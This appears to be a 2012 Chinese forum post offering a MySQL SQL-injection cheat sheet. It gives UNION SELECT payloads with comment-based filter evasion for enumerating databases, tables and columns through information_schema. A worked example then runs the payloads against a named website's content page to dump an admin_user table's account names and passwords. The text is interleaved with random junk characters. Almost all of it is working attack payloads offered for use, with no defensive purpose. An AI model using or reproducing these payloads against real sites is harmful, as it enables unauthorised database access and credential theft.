查库
3 q! `; o# G6 E7 C2 H9 z% S. W
$ p R! N% B1 did=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*+ g3 V' _2 Q; D" _
0 q( U/ @4 t( ]% f* X, ?5 c1 F查表5 f* h9 ?8 v3 G& R1 y
" B8 l+ A$ P+ i# J: \
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1: [# t& u( X& Y% P. ^8 K) f
+ ^" p. _. r* l; {1 T* U
查段) ?& s7 `# ~ l: U' i$ {
( f; q9 _5 R' I% C3 e( w2 ^, Z! w# U
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
) w4 P3 h7 o8 Y* ?$ O! I
8 f0 H9 h+ |3 b+ f, f9 d {3 d4 D' Y3 |9 I
mysql5高级注入方法暴表* G w5 a. H v9 b: F8 D8 ^
! X/ ?8 N8 ~, z# m' R. |例子如下:" T% N% H* V g! ^) K* s) d' |
* S( X3 B. Y3 g% U4 O
1.爆表
2 b; I" {) i& ]' K# w# X- |http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
: |. S: T! @, b) ^7 M- C这样爆到第4个时出现了admin_user表。
6 w) ^2 O0 R( Q! C
3 ?' L: u4 v2 ^& n: I r- W2.暴字段* |+ v2 F$ B! u' A
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
4 n( c) e# o5 ^/ K- G! T- Q z/ H: |; J4 B1 Q, N( X
& Y o) d& {3 ^' N6 C. \' R7 }( r3.爆密码
% A2 ~6 h* M: f. a# k. @- j, q; ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
! Q: c. q2 o& h
9 @- w6 R q: ^9 J# M
$ d& V6 J, ?: {4 `7 j |
发表于 2012-9-13 16:29:37
收藏
支持
反对